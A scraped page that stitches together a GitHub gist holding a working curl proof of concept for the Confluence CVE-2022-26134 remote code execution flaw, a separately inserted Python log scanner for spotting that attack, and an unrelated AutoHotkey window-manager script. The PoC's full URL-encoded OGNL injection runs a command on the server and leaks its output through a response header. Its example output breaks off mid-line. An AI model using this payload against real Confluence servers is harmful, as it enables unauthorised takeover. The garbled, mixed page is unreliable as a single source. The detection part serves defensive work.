@jbaines-r7
jbaines-r7 / cve_2022_26134_curl.md
Created June 6, 2022 18:06
Confluence CVE-2022-26134 Curl PoC

The following curl proof of concept executes a command on Confluence 7.18.0 and below and exfiltrates its output. The command below executes `whoami` and stores the output in the `X-Cmd-Response` HTTP header.

curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

Example:

albinolobster@ubuntu:~$ curl -v http://10.0.0.28:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.Script
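On the detection side, the request above stands out in web access logs because its path, once percent-decoded, is a `${...}` expression. The following Python scanner is an added example, not part of the original gist; the Common Log Format input, the token list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Tokens visible in the decoded request path of the PoC above. The list is an
# assumption for triage; a ${...} expression in a path is reported without them too.
SUSPICIOUS = ("Class.forName", "ScriptEngineManager", "getRuntime", "ServletActionContext", ".exec(")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')  # CLF request field
OGNL_RE = re.compile(r"\$\{.*\}", re.DOTALL)


def decode_fully(uri, max_rounds=3):
    """Percent-decode repeatedly; logs written behind a proxy may hold the path encoded twice."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def inspect_line(line):
    """Return a finding for a log line whose URI path carries a ${...} expression, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Only the path is inspected, matching the request shape shown on this page.
    path = decode_fully(m.group("uri").split("?", 1)[0])
    expr = OGNL_RE.search(path)
    if not expr:
        return None
    hits = [t for t in SUSPICIOUS if t in expr.group(0)]
    return {"client": line.split(" ", 1)[0], "severity": "high" if hits else "review", "tokens": hits}


def scan(lines):
    """Collect findings for every matching line."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample access-log lines (shortened paths, not taken from a real host).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jun/2022:18:00:01 +0000] "GET /dashboard.action HTTP/1.1" 200 5120',
    '192.0.2.66 - - [06/Jun/2022:18:00:07 +0000] "GET /%24%7BClass.forName%28%22javax.script.ScriptEngineManager%22%29%7D/ HTTP/1.1" 302 0',
    '192.0.2.67 - - [06/Jun/2022:18:00:09 +0000] "GET /%2524%257B1%252B1%257D/ HTTP/1.1" 302 0',
    '192.0.2.11 - - [06/Jun/2022:18:00:12 +0000] "GET /pages/viewpage.action?pageId=1&q=%24%7Bx%7D HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A response carrying an `X-Cmd-Response` header, as in the PoC, is a second signal worth alerting on at a reverse proxy or in packet captures.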
@crosstyan
crosstyan / komorebic.ahk
Last active June 8, 2024 14:19
komorebic.ahk for AutoHotkey v2
#SingleInstance Force
WorkspaceNumber := 9

; Build an array holding 0 .. Length-1 (A_Index starts at 1, hence the -1).
ArrayFromZero(Length){
    temp := []
    Loop Length {
        temp.Push(A_Index-1)
    }
    return temp
}